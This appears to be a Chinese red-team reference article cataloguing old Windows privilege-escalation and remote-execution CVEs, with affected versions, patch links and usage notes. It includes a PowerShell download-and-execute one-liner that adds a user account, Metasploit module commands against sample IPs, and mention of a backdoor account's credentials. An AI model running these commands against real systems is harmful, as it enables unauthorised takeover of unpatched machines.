近20年Windows权限提升集合（下）

脉搏文库 ascotbe

2020-10-27 10,978

声明

郑重声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

前言

这篇文章是基于红蓝功防中的一个小结提取出来的文章，主要都是一些CVE的利用

文章所使用的源码地址

各位师傅麻烦点个Star

  https://github.com/Ascotbe/KernelHub

复现环境

系统环境

#Windows 7 SP1 X64 
ed2k://|file|cn_windows_7_home_premium_with_sp1_x64_dvd_u_676691.iso|3420557312|1A3CF44F3F5E0BE9BBC1A938706A3471|/
#Windows 7 SP1 X86
ed2k://|file|cn_windows_7_home_premium_with_sp1_x86_dvd_u_676770.iso|2653276160|A8E8BD4421174DF34BD14D60750B3CDB|/
#Windows Server 2008 R2 SP1 X64 
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso|3368839168|D282F613A80C2F45FF23B79212A3CF67|/
#Windows Server 2003 R2 SP2 x86
ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
#Windows Server 2003 R2 SP2 x64
ed2k://|file|cn_win_srv_2003_r2_enterprise_x64_with_sp2_vl_cd1_X13-47314.iso|647686144|107F10D2A7FF12FFF0602FF60602BB37|/
#Windows Server 2008 SP2 x86
ed2k://|file|cn_windows_server_standard_enterprise_and_datacenter_with_sp2_x86_dvd_x15-41045.iso|2190057472|E93B029**42F19024AA9EF8FB02AC90B|/
#Windows Server 2000 SP4 x86
ed2k://|file|ZRMPSEL_CN.iso|402690048|00D1BDA0F057EDB8DA0B29CF5E188788|/
#Windows Server 2003 SP2 x86
thunder://QUFodHRwOi8vcy5zYWZlNS5jb20vV2luZG93c1NlcnZlcjIwMDNTUDJFbnRlcnByaXNlRWRpdGlvbi5pc29aWg==
#Windows 8.1 x86
ed2k://|file|cn_windows_8_1_enterprise_x86_dvd_2972257.iso|3050842112|6B60ABF8282F943FE92327463920FB67|/
#Windows 8.1 x64
ed2k://|file|cn_windows_8_1_x64_dvd_2707237.iso|4076017664|839CBE17F3CE8411E8206B92658A91FA|/
#Windows 10 1709 x64
ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_dec_2017_x64_dvd_100406208.iso|5007116288|317BDC520FA2DD6005CBA8293EA06DF6|/
#Windows 10 2004 x64 (2020-05-21 release version)
magnet:?xt=urn:btih:8E49569FDE852E4F3CCB3D13EFB296B6B02D82A6

所需Linux编译环境

sudo vim /etc/apt/sources.list
#在sources.list末尾添加deb http://us.archive.ubuntu.com/ubuntu trusty main universe
sudo apt-get update
sudo apt-get install mingw32 mingw32-binutils mingw32-runtime
sudo apt-get install gcc-mingw-w64-i686 g++-mingw-w64-i686 mingw-w64-tools

所需Windows编译环境

VS2019（内置V142、V141、V120、V110、V120_xp、V110_xp、MFC）

CVE-2016-0095

描述

漏洞的原理是空指针解引用，导致Win32k内核提权漏洞的产生

影响版本

Product	Version	Update	Tested
Windows 10	-
Windows 10	1511
Windows 7	-	SP1	✔️
Windows 8.1	-
Windows Rt 8.1	-
Windows Server 2008		SP2
Windows Server 2008	R2	SP1	✔️
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0095

利用方式

项目中的x64版本对于windows 7 sp1 x64和windows server 2008 R2 sp1 x64可以完美利用，项目中的x86版本只能对windows7利用（关闭窗口后会导致蓝屏）

测试windows 7 sp1 x64的GIF图

CVE-2016-0099

描述

此漏洞影响从Vista到Windows 10的所有Windows版本（包括服务器版本）以及为了实现利用，因为PowerShell脚本指示需要满足以下要求：目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行

影响版本

Product	Version	Update	Tested
Windows 10	-
Windows 10	1511
Windows 7	-	SP1	✔️
Windows 8.1	-
Windows Rt 8.1	-
Windows Server 2008		SP2	✔️
Windows Server 2008	R2	SP1	✔️
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0099

利用方式

目标系统需要有2个以上的CPU核心

PS脚本测试，在Windows server 2008 R2 sp1 x64执行下面命令

Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

还能远程添加账户

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"

GIF图如下

利用exe文件测试通杀x64和x86的所有版本，这边只录制Windows 7 sp1 x64版本的

CVE-2016-0051

描述

该漏洞存在于Microsoft Web 分布式创作和版本管理 (WebDAV)中，如果 Microsoft Web 分布式创作和版本管理 (WebDAV) 客户端验证输入不当，那么其中就会存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。

影响版本

Product	Version	Update	Tested
Windows 10	-
Windows 10	1511
Windows 7		SP1	✔️
Windows 8.1
Windows Rt 8.1
Windows Server 2008		SP2
Windows Server 2008	R2	SP1
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0051

利用方式

编译方式

VS2019（V140）X86 Debug

需要把CVE-2016-0051_x86.zip解压后的两个文件放到目标中

CVE-2015-2546

描述

微软安全公告MS15-097修复了Microsoft Graphics组件中多个内核漏洞。其中Win32k内存损坏特权提升漏洞：CVE-2015-2546该漏洞是FireEye在9月8日发布的一份攻击报告中发现的，攻击者利用该漏洞可获得系统SYSTEM权限。

影响版本

Product	Version	Update	Edition	Tested
Windows 10	-
Windows 7	-	SP1		✔️
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1	itanium
Windows Server 2008	R2	SP1	x64
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista	-	SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2546

利用方式

编译环境

VS2019 （V142）X86 Release

当前只有x86版本的EXP，测试GIF图

CVE-2015-2370

描述

存在于DCOM/RPC中的漏洞,这个漏洞允许攻击者发起NTLM身份认证请求,然后便可以监听目标主机的TCP套接字通信数据了，将漏洞利用的方式改为向目标主机磁盘的任意位置写入任意文件

影响版本

Product	Version	Update	Edition	Tested
Windows 2003 Server		SP2
Windows 2003 Server	R2	SP2
Windows 7	-	SP1		✔️
Windows 8	-
Windows 8.1	-			✔️
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1
Windows Server 2012	-
Windows Server 2012	R2		datacenter
Windows Server 2012	R2		essentials
Windows Server 2012	R2		standard
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2370

利用方式

编译方式

VS2019 Any CPU Release

x64/x86 Windows 7/8.1都可以利用成功，这个漏洞就是可以像任意文件目录写入文件，就比如说我在c:\windows\system32\这个目录没有权限写入文件，但是我可以利用漏洞在这个文件写入文件

#把桌面的test.txt文件写入到System32文件夹中
Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt

CVE-2015-0003

描述

允许本地用户通过精心设计的应用程序（也称为“ Win32k特权提升漏洞”）获得特权或导致拒绝服务（取消引用空指针）。

影响版本

Product	Version	Update	Edition	Tested
Windows 7	-	SP1		✔️
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2003	-	SP2
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1	itanium
Windows Server 2008	R2	SP1	x64
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista	-	SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0003

利用方式

X86机器利用

编译方式

VS2019 （V120_xp）X86 Release

利用windows 7 sp1 x86作为演示

x64利用

编译方式

VS2019 （V142）X64 Release

利用Windows server 2008 R2 sp1 x64进行测试

CVE-2015-1725

描述

这个是一个位于 win32k.sys 的释放后重用漏洞。漏洞的起因是没有为用户模式回调函数给窗口内核类型加锁，该漏洞可以由 win32k.sys 中的 xxxSetClassLong 函数触发。成功利用该漏洞将导致特权提升到“NT AUTHORITY/SYSTEM”。

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2003	-	SP2
Windows Server 2003	R2	SP2
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1	itanium
Windows Server 2008	R2	SP1	x64
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista	-	SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1725

利用方式

暂无

CVE-2015-1701

描述

如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象，则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

影响版本

Product	Version	Update	Edition
Windows 2003 Server		SP2
Windows 7	-	SP1	x64
Windows Server 2008	-	SP2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1701

利用方式

编译方式

VS2019 （V140）X64 Release
VS2019 （V140）X86 Release

x86利用

测试机器 windows 7 sp1 x86

x64利用

测试使用windows server 2008 R2 sp1 x64

CVE-2015-0062

描述

允许本地用户通过精心设计的应用程序获取特权，这些应用程序在使用过程中利用了不正确的模拟处理 SeAssignPrimaryTokenPrivilege特权。

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2008	R2	SP1	itanium
Windows Server 2008	R2	SP1	x64
Windows Server 2012	-
Windows Server 2012	R2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0062

利用方式

暂无

CVE-2015-0057

描述

内核模式驱动程序中的win32k.sys允许本地用户通过精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition	Tested
Windows 7	-	SP1		✔️
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2003	-	SP2
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1	itanium	✔️
Windows Server 2008	R2	SP1	x64	✔️
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista	-	SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0057

利用方式

目前有两个源码

CVE-2015-0057_win8.1文件夹下面的针对Windows8.1的源码，可行性未测试
exploit-db下载下来的源码也未测试

测试使用的是网上找到的编译好的EXPCVE-2015-0057_x86和CVE-2015-0057_x64，可以对Windows7/2008利用成功，会添加用户账号k8team$ 密码K8TeAm520!@#

对Windows 7 sp1 x86进行测试

CVE-2015-0002

描述

应用程序兼容性组件中的ahcache.sys中的ahcache.sys中的AhcVerifyAdminContext函数不会验证模拟令牌与一个管理帐户关联，该帐户允许本地用户通过使用精心制作的DLL文件运行AppCompatCache.exe来获得特权。

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1
Windows 8	-
Windows 8.1	-
Windows Rt	-	Gold
Windows Rt 8.1	-
Windows Server 2008	R2	SP1
Windows Server 2012	-	Gold
Windows Server 2012	R2		x64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002

利用方式

暂无

CVE-2014-4076

描述

本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。

影响版本

Product	Update	Edition
Windows Server 2003	SP2	x86
Windows Server 2003	SP2	tanium
Windows Server 2003	SP2	x64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076

利用方式

编译环境

i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

CVE-2014-4113

描述

如果 Win32k.sys 内核模式驱动程序不正确地处理内存中的对象，则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

影响版本

Product	Version	Update	Tested
Windows 7	-	SP1	✔️
Windows 8	-
Windows 8.1	-
Windows Rt	-	Gold
Windows Rt 8.1	-
Windows Server 2003		SP2
Windows Server 2008		SP2
Windows Server 2008	R2	SP1
Windows Server 2012	-	Gold
Windows Server 2012	R2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4113

利用方式

目前只有x86版本的源码，x64源码没有找到

编译方式

VS2019 （V140）X86 Release

x86利用

测试系统Windows 7 sp1 x86

x64利用

测试系统Windows 7 sp1 x64

CVE-2014-6321

描述

Schannel允许远程攻击者通过精心设计的数据包远程执行代码

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1
Windows 8	-
Windows 8.1	-
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2003	-	SP2
Windows Server 2008	-	SP2
Windows Server 2008	R2	SP1	itanium
Windows Server 2008	R2	SP1	x64
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista	-	SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321

利用方式

暂无

CVE-2014-1767

描述

内核模式驱动程序中afd.sys的辅助功能驱动程序（AFD）中的双重释放漏洞允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Tested
Windows 7		SP1	✔️
Windows 8
Windows 8.1
Windows Rt	-
Windows Rt 8.1	-
Windows Server 2003		SP2
Windows Server 2008		SP2
Windows Server 2008	R2	SP1
Windows Server 2012	-
Windows Server 2012	R2
Windows Vista		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1767

利用方式

利用脚本是python的，还有编译好的exe版本

x86利用

测试系统Windows 7 sp1 x86 ，测试exe文件和py脚本都可以正常利用

x64利用

测试系统Windows 7 sp1 x64 测试利用py脚本，exe文件有机率蓝屏

CVE-2014-4076

描述

本地用户通过对tcpip.sys或tcpip6.sys的精心制作的IOCTL调用来获得特权。

影响版本

Product	Update	Edition	Tested
Windows Server 2003	SP2	x64
Windows Server 2003	SP2	x86	✔️
Windows Server 2003	SP2	itanium

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-4076

利用方式

编译环境

i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe

CVE-2013-5065

描述

内核中的NDProxy.sys允许本地用户通过精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition	Tested
Windows 2003 Server		SP2
Windows Xp		SP2
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065

利用方式

暂无

i586-mingw32msvc-gcc CVE-2013-5065.c -o CVE-2013-5065.exe

CVE-2013-1345

描述

内核模式驱动程序中的win32k.sys不会正确处理内存中的对象，这允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition	Tested
Windows 7		SP1	X64
Windows 7		SP1	X86	✔️
Windows 8	-	-	X64
Windows 8	-	-	X86
Windows Rt	-
Windows Server 2003		SP2
Windows Server 2003		SP2	Itanium
Windows Server 2003		SP2	X64
Windows Server 2008		SP2	Itanium
Windows Server 2008		SP2	X64
Windows Server 2008		SP2	X86	✔️
Windows Server 2008	R2	SP1	Itanium	✔️
Windows Server 2008	R2	SP1	X64
Windows Server 2012	-
Windows Vista		SP2
Windows Vista		SP2	X64
Windows Xp	-	SP2	X64
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1345

利用方式

X86利用

测试系统windows 7 sp1 x86 ，直接使用msf即可，我们当机器已经上线了

use exploit/windows/local/ms13_053_schlamperei
set SESSION 2 #你上线机器的session
run

Windows sever 2003 sp2 x86 和Windows sever 2003 R2 sp2 x86都测试成功，但是利用文件没有源码只有exe可执行文件

Windows sever 2003 sp2 x86 动图如下

Windows sever 2003 R2 sp2 x86 动图如下

CVE-2013-1332

描述

核模式驱动程序中的dxgkrnl.sys（aka DirectX图形内核子系统）在内存中，本地用户可以通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1	X64
Windows 7	-	SP1	X86
Windows 8	-	-	X64
Windows 8	-	-	X86
Windows Rt	-
Windows Server 2003		SP2
Windows Server 2008		SP2	Itanium
Windows Server 2008		SP2	X64
Windows Server 2008		SP2	X86
Windows Server 2008	R2	SP1	X64
Windows Server 2008	R2	SP1	Itanium
Windows Server 2012	-
Windows Vista	-	SP2
Windows Vista		SP2	X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-1332

利用方式

编译环境

VS2019（V120_xp）X64 Release
VS2019（V120_xp）X86 Release
字符集需要替换成多字节字符集不然无法利用

测试系统windows server 2003 SP2

CVE-2013-0008

描述

内核模式驱动程序中的win32k.sys无法正确处理窗口广播消息，它允许本地用户通过精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition
Windows 7	-	SP1	X64
Windows 7			X64
Windows 7			X86
Windows 7		SP1	X86
Windows 8	-	-	X64
Windows 8	-	-	X86
Windows Rt	-
Windows Server 2008	-	SP2	Itanium
Windows Server 2008		SP2	X64
Windows Server 2008		SP2	X86
Windows Server 2008	R2		Itanium
Windows Server 2008	R2		X64
Windows Server 2008	R2	SP1	Itanium
Windows Server 2008	R2	SP1	X64
Windows Server 2012	-
Windows Vista		SP2
Windows Vista		SP2	X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-0008

利用方式

msf 利用失败

CVE-2012-0217

描述

某些其他操作系统（在Intel处理器上运行时）在某些地址不是规范地址的情况下会错误地使用sysret路径，从而使本地用户可以通过精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition	Tested
Windows 7		SP1	X64
Windows 7			X64
Windows Server 2003		SP2
Windows Server 2008	R2		X64
Windows Server 2008	R2	SP1	X64	✔️
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2012-0217

利用方式

编译环境

VS2019（V100）X64 Release

测试系统windows server 2008 R2 ps1 x64

CVE-2011-2005

描述

辅助功能驱动程序中的afd.sys无法正确验证传递给内核模式的用户模式输入，这允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition	Tested
Windows 2003 Server		SP2
Windows Server 2003		SP2	Itanium	✔️
Windows Server 2003		SP2	X64
Windows Xp	-	SP2	X64
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-2005

利用方式

测试系统windows server 2003 sp2 x86

msf利用直接使用这个即可

use exploit/windows/local/ms11_080_afdjoinleaf

CVE-2011-1974

描述

远程访问服务（RAS）中的NDISTAPI驱动程序中的NDISTAPI.sys无法正确验证用户模式输入，这允许本地用户通过精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition
Windows 2003 Server		SP2
Windows Server 2003		SP2	Itanium
Windows Server 2003		SP2	X64
Windows Xp	-	SP2	X64
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1974

利用方式

编译命令

i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32

测试系统windows server 2003 sp2 x86，首先需要用管理员修改注册表和开启服务

接着切回普通用户

CVE-2011-1249

描述

afd.sys中的辅助功能驱动程序（AFD）未正确验证用户模式输入，从而使本地用户无法通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition
Windows 2003 Server		SP2
Windows 7	-	SP1	X64
Windows 7	-	SP1	X86
Windows Server 2003		SP2	Itanium
Windows Server 2003		SP2	X64
Windows Server 2008	-	SP2	Itanium
Windows Server 2008			X32
Windows Server 2008			X64
Windows Server 2008		SP2	X32
Windows Server 2008		SP2	X64
Windows Server 2008			Itanium
Windows Server 2008	R2		Itanium
Windows Server 2008	R2		X64
Windows Server 2008	R2	SP1	Itanium
Windows Server 2008	R2	SP1	X64
Windows Vista		SP1
Windows Vista		SP2
Windows Xp	-	SP2	X64
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-1249

利用方式

编译文件

i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32

测试系统windows server 2003 sp2 x86和windows 7 sp1 x86都成功

CVE-2011-0045

描述

内核中的跟踪事件功能无法正确执行类型转换，这会导致整数截断和不足的内存分配并触发缓冲区溢出，从而使本地用户可以通过与WmiTraceMessageVa相关的精心设计的应用程序获得特权

影响版本

Product	Version	Update	Edition	Tested
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045

利用方式

暂无

CVE-2010-4398

描述

win32k.sys中的RtlQueryRegistryValues函数中基于堆栈的缓冲区溢出特权，并通过为SystemDefaultEUDCFont注册表项的特制REG_BINARY值来绕过用户帐户控制（UAC）功能。

影响版本

Product	Version	Edition
Windows 2003 Server
Windows 7
Windows Server 2008		Itanium
Windows Server 2008		X32
Windows Server 2008		X64
Windows Server 2008	R2	Itanium
Windows Server 2008	R2	X64
Windows Vista
Windows Xp

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-4398

利用方式

暂无

CVE-2010-3338

描述

Windows Task Scheduler无法正确确定计划任务的安全上下文，这使本地用户可以通过精心设计的应用程序获取特权

影响版本

Product	Version	Update	Edition
Windows 7	-
Windows Server 2008	-	SP2	Itanium
Windows Server 2008			X64
Windows Server 2008		SP2	X32
Windows Server 2008		SP2	X64
Windows Server 2008			Itanium
Windows Server 2008			X32
Windows Server 2008	R2		X64
Windows Server 2008	R2		Itanium
Windows Vista		SP1
Windows Vista		SP1	X64
Windows Vista		SP2
Windows Vista		SP2	X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-3338

利用方式

测试系统 windows server 2008 sp2 x86，利用msf执行如下命令即可，x64版本msf不支持

use exploit/windows/local/ms10_092_schelevator
set SESSION 2
run

然后就能提权成功了

CVE-2010-2554

描述

服务跟踪功能在其注册表项上具有不正确的ACL，这使本地用户可以通过涉及命名管道和模拟的向量获得特权。

影响版本

Product	Version	Update	Edition
Windows 7	-
Windows Server 2008	-	SP2	Itanium
Windows Server 2008		R2	Itanium
Windows Server 2008		R2	X64
Windows Server 2008		SP2	X32
Windows Server 2008			Itanium
Windows Server 2008		SP2	X64
Windows Server 2008			X32
Windows Server 2008			X64
Windows Vista	-	SP1
Windows Vista	-	SP2
Windows Vista		SP1	X64
Windows Vista		SP2
Windows Vista		SP2	X64
Windows Vista		SP1

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-2554

利用方式

暂无

CVE-2010-1897

描述

win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值在窗口创建期间的回调参数中，它允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition
Windows 2003 Server		SP2
Windows 2003 Server		SP2	Itanium
Windows 7	-
Windows 7
Windows Server 2003		SP2	X64
Windows Server 2008	-	SP2	Itanium
Windows Server 2008			X64
Windows Server 2008		R2	Itanium
Windows Server 2008		R2	X64
Windows Server 2008		SP2	X32
Windows Server 2008			Itanium
Windows Server 2008		SP2	X64
Windows Server 2008			X32
Windows Vista	-	SP1
Windows Vista		SP1
Windows Vista		SP1	X64
Windows Vista		SP2
Windows Vista		SP2	X64
Windows Xp	-	SP2	X64
Windows Xp		SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-1897

利用方式

测试系统windows server 2003 sp2 x86

CVE-2010-0233

描述

内核中的双重免费漏洞允许本地用户通过精心设计的应用程序获得特权。

影响版本

Product	Version	Update	Edition
Windows 2000	SP4
Windows Server 2003		SP2
Windows Server 2008	-	SP2	Itanium
Windows Server 2008		SP2	X64
Windows Server 2008			Itanium
Windows Server 2008			X32
Windows Server 2008			X64
Windows Server 2008	SP2	X32
Windows Vista
Windows Vista	SP1
Windows Vista	SP2
Windows Xp	-
Windows Xp	SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0233

利用方式

编译环境

nmake 2013

测试系统windows server 2003 sp2 x86

msf利用

测试系统windows server 2003 sp2 x86，执行以下代码

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
run

可以看到当前权限是最低的

然后执行命令提权

CVE-2010-0270

描述

SMB客户端无法正确验证SMB事务响应中的字段，这允许远程SMB服务器和中间人攻击者执行任意代码或导致拒绝服务（内存损坏和通过SMBv1或SMBv2响应重新启动）。

影响版本

Product	Version	Update	Edition
Windows 7	-
Windows 7
Windows Server 2008		R2	Itanium
Windows Server 2008		R2	X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-0270

利用方式

暂无

CVE-2009-2532

描述

无法正确处理SMB多协议协商请求数据包中的命令值，这使远程攻击者可以通过精心制作的SMBv2执行任意代码数据包发送到服务器服务

影响版本

Product	Version	Update	Edition
Windows Server 2008	-
Windows Server 2008	-	SP2
Windows Server 2008	-	SP2	Itanium
Windows Server 2008	-	SP2	X64
Windows Server 2008	-	SP2	X86
Windows Server 2008			Itanium
Windows Server 2008			X32
Windows Server 2008			X64
Windows Vista	-	SP1
Windows Vista	-	SP2
Windows Vista			X64
Windows Vista		SP1	X64
Windows Vista		SP2	X64
Windows Vista

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-2532

利用方式

利用msf 测试系统windows server 2008 sp2 x86

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run

CVE-2009-0079

描述

RPCSS服务不能在一组不同的进程之间正确实现隔离，这些进程全部在NetworkService帐户下运行，或者所有在LocalService帐户下运行，这允许本地用户通过访问其中一个进程的资源来获得特权。

影响版本

Product	Update	Edition
Windows Server 2003	SP1
Windows Server 2003	SP1	Itanium
Windows Server 2003	SP2
Windows Server 2003	SP2	Itanium
Windows Server 2003	SP2	X64
Windows Server 2003		X64
Windows Xp		Pro X64
Windows Xp	SP2
Windows Xp	SP2	Pro X64
Windows Xp	SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-0079

利用方式

暂无

CVE-2008-4037

描述

通过远程SMB服务器可以重播客户端用户的NTLM凭据在客户端计算机上执行任意代码

影响版本

Product	Version	Update	Edition
Windows XP		SP2
Windows XP		SP2	X64
Windows XP		SP3
Windows XP		Unknown	X64
Windows Server 2003		SP1	Itanium
Windows Server 2003		SP2
Windows Server 2003		SP2	Itanium
Windows Server 2003		SP2	X64
Windows Server 2003		Unknown	X64
Windows Server 2003		SP1
Windows 2000	-	SP4
Windows Server 2008	-		X32
Windows Server 2008	-		X64
Windows Server 2008	-		Itanium
Windows Vista	-	SP1	X64
Windows Vista	-
Windows Vista	-		X64
Windows Vista	-	SP1

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4037

利用方式

使用msf 测试系统windows server 2003 sp2 x86

use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.14 #目标IP
run

CVE-2008-4250

描述

Pre-Beta中的Server服务允许远程攻击者通过精心设计的RPC请求执行任意代码，该请求会在执行以下操作时触发溢出路径规范化。

影响版本

Product	Update	Edition
Windows 2000	SP4
Windows Server 2003	SP1
Windows Server 2003	SP1	Itanium
Windows Server 2003	SP2
Windows Server 2003	SP2	Itanium
Windows Server 2003	SP2	X64
Windows Server 2003		X64
Windows Server 2008		X32
Windows Server 2008		X64
Windows Server 2008		Itanium
Windows Vista	SP1	X64
Windows Vista
Windows Vista		X64
Windows Vista	SP1
Windows Xp		Professional X64
Windows Xp	SP2
Windows Xp	SP2	Professional X64
Windows Xp	SP3

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-4250

利用方式

使用msf 测试系统windows server 2003 sp2 x86

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.14
run

CVE-2008-3464

描述

辅助功能驱动程序（AFD）组件中的afd.sys无法正确验证从用户模式发送到内核的输入，这允许本地用户通过精心设计的应用程序获取特权，如使用精心设计的指针和长度所说明的那样，这些指针和长度绕过了预期的ProbeForRead和ProbeForWrite限制。

影响版本

Product	Version	Update	Edition
Windows 2003 Server		SP2
Windows 2003 Server		SP2	Itanium
Windows 2003 Server		SP2	X64
Windows 2003 Server			X64
Windows 2003 Server		SP1	Itanium
Windows 2003 Server	Professional	SP3
Windows Xp		SP2	Professional X64
Windows Xp		SP3
Windows Xp			Professional X64
Windows Xp		SP2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-3464

利用方式

只找到可执行exe文件，测试系统windows server 2003 sp2 x86

CVE-2008-1084

描述

内核中未指定的漏洞允许本地用户通过与错误输入验证有关的未知向量执行任意代码。

影响版本

Product	Version	Update	Edition
Windows 2000		SP4
Windows 2003 Server		SP2	X64
Windows 2003 Server			X64
Windows 2003 Server		SP1
Windows 2003 Server		SP1	Itanium
Windows 2003 Server		SP2
Windows 2003 Server		SP2	Itanium
Windows Server 2008	-
Windows Vista			X64
Windows Vista		SP1
Windows Vista		SP1	X64
Windows Xp		SP2
Windows Xp		SP2	X64
Windows Xp			X64

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2008-1084

利用方式

测试系统windows server 2003 sp2 x86

CVE-2006-3439

描述

服务器服务中的缓冲区溢出允许包括匿名用户在内的远程攻击者通过精心制作的RPC消息执行任意代码

影响版本

